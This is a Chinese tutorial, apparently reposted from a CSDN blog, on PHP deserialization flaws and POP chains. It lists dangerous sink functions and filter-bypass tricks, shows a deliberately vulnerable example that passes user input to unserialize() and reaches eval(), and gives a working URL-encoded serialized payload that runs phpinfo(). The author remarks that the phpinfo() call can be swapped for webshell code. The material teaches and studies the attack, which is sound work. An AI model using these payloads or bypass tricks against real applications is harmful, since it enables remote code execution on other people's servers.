文章详情

短信预约-IT技能 免费直播动态提醒

请输入下面的图形验证码

提交验证

短信预约提醒成功

php反序列化漏洞之pop链

2023-09-29 08:17

关注

目录

POP链简介

pop面向属性编程:

pop chain

pop链利用技巧

1、在pop链中出现的方法:

2、反序列化中为了避免信息丢失,可以使用大写S,支持字符串的编码

3、深浅copy

4、利用php伪协议

POP键构造复现:

例子1:

分析:

大概payload为:

最后我们的payload为:

结果:(phpinfo();内容可以改为木马代码)


POP链简介

pop面向属性编程:

常用于上层语言构造特定调用链的方法,与二进制利用中的面向返回编程(Return-Oriented Programing)的原理相似,都是从现有运行环境中寻找一系列的代码或者指令调用,然后根据需求构成一组连续的调用链,最终达到攻击者邪恶的目的。类似于PWN中的ROP,有时候反序列化一个对象时,由它调用的__wakeup()中又去调用了其他的对象,由此可以溯源而上,利用一次次的  " gadget " 找到漏洞点。

pop chain

把魔术方法作为最开始的小组件,然后在魔术方法中调用其他函数(小组件),通过寻找相同名字的函数,再与类中的敏感函数和属性相关联,就是POP CHAIN 。此时类中所有的敏感属性都属于可控的。当unserialize()传入的参数可控,便可以通过反序列化漏洞控制POP CHAIN达到利用特定漏洞的效果。

pop链利用技巧

1、在pop链中出现的方法:

- 命令执行:exec()、passthru()、popen()、system()

- 文件操作:file_put_contents()、file_get_contents()、unlink()

- 代码执行:eval()、assert()、call_user_func()

2、反序列化中为了避免信息丢失,可以使用大写S,支持字符串的编码

PHP 为了更加方便进行反序列化 Payload 的 传输与显示(避免丢失某些控制字符等信息),我们可以在序列化内容中用大写S表示字符串,此时这个字符串就支持将后面的字符串用16进制表示,使用如下形式即可绕过,即:

s:4:"user"; -> S:4:"use\72";

3、深浅copy

在php中如果我们使用 & 对变量A的值指向变量B,这个时候是属于浅拷贝,当变量B改变时,变量A也会跟着改变。在被反序列化的对象的某些变量被过滤了,但是其他变量可控的情况下,就可以利用浅拷贝来绕过过滤。

$A = &$B; 

4、利用php伪协议

配合PHP伪协议实现文件包含、命令执行等漏洞。

php伪协议_奋斗的小智的博客-CSDN博客_php伪协议写文件PHP伪协议,也是php支持的协议和封装协议。file:// 访问本地文件系统php:// 访问各个输入/输出流data:// 数据zip:// 压缩流 不过有些伪协议需要allow_url_fopen和allow_url_include的支持。allow_url_fopen On/Off 允许或禁止打开URL文件allow_url_include On/Off 允许或禁止引用URL文件。https://blog.csdn.net/weixin_60719780/article/details/128773811

POP键构造复现:

例子1:

ClassObj = new normal();    }    function __destruct() {        $this->ClassObj->action();    }}class normal {    function action() {        echo "hello bmjoker";    }}class evil {    private $data;    function action() {        eval($this->data);    }}//$a = new main();unserialize($_GET['a']);?>

分析:

代码审计;针对以上代码我首先看到 eval这个危险函数 ,它是命令执行方法函数,而且不在魔术方法中的,eval 在action 函数中的,而action函数又在evil类中,也就是说要执行eval,那必须要执行action函数,那我们继续看代码,发现action函数也在normal类中的,而我们的__destruct()析构函数执行方式是(析构函数,和构造函数相反,在对象不再被使用时(将所有该对象的引用设为null)或者程序退出时自动调用),这个函数是必须执行的,__destruct()在程序结束时会去调用normal类中的action()方法,而我们最终的目的是去调用evil类中的action()方法,并伪造evil类中的变量$data,达成任意代码执行的目的。

大概payload为:

class main {    protected  $ClassObj = new evil();}class evil {    private $date = 'phpinfo();';}

特别注意:我在构建payload时候,提交的时候为空(\x00)显示为%20 它是空格的意思,第一次提交出现无法解析,我没有注意到,这里我说出来,大家可以避免这个问题)

受Private修饰的私有成员,序列化时: \x00 +  [私有成员所在类名]  + \x00 [变量名]

受Protected修饰的成员,序列化时:\x00 + * + \x00 + [变量名]

其中,"\x00"代表ASCII为0的值,即空字节," * " 必不可少。

最后我们的payload为:

O%3A4%3A%22main%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00ClassObj%22%3BO%3A4%3A%22evil%22%3A1%3A%7Bs%3A10%3A%22%00evil%00data%22%3Bs%3A10%3A%22phpinfo%28%29%3B%22%3B%7D%7D

结果:(phpinfo();内容可以改为木马代码)

还有几道有特点的题,我还没搞明白,掌握后我再整理。

来源地址:https://blog.csdn.net/weixin_60719780/article/details/128943473

阅读原文内容投诉

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

软考中级精品资料免费领

  • 历年真题答案解析
  • 备考技巧名师总结
  • 高频考点精准押题
  • 2024年上半年信息系统项目管理师第二批次真题及答案解析(完整版)

    难度     801人已做
    查看
  • 【考后总结】2024年5月26日信息系统项目管理师第2批次考情分析

    难度     348人已做
    查看
  • 【考后总结】2024年5月25日信息系统项目管理师第1批次考情分析

    难度     311人已做
    查看
  • 2024年上半年软考高项第一、二批次真题考点汇总(完整版)

    难度     432人已做
    查看
  • 2024年上半年系统架构设计师考试综合知识真题

    难度     220人已做
    查看

相关文章

发现更多好内容

猜你喜欢

AI推送时光机
位置:首页-资讯-后端开发
咦!没有更多了?去看看其它编程学习网 内容吧
首页课程
资料下载
问答资讯